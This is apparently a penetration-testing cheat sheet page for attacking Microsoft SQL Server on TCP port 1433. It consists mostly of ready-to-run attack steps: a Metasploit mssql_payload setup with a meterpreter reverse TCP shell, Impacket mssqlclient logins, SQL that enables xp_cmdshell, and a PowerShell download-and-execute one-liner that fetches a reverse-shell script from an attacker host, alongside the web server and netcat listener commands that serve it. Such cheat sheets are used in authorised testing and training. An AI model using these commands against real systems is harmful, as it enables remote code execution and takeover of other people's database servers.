1433/TCP (MSSQL Server)

Microsoft SQL Server.

Metasploit

use exploit/windows/mssql/mssql_payload
set username <username>
set password <password>
set rhosts <IP-address>
set payload windows/x64/meterpreter_reverse_tcp
set lhost <attacker-IP-address>
set lport <listen-port>
run

Impacket

# Windows authentication
mssqlclient.py <target-name>/<username>:<password>@<IP-address> -windows-auth
# Microsft SQL Server authentication
mssqlclient.py <target-name>/<username>:<password>@<IP-address>

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
sp_configure;
EXEC master..xp_cmdshell 'whoami';

python3 -m http.server 80
cp reverse-shell.ps1 .
nc -lvnp <listen-port>

EXEC master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attacker-IP-address>/reverse-shell.ps1\");'

Anterior161/UDP, 162/UDP (SNMP)Siguiente2049/TCP (NFS)

Última actualización hace 2 años

¿Te fue útil?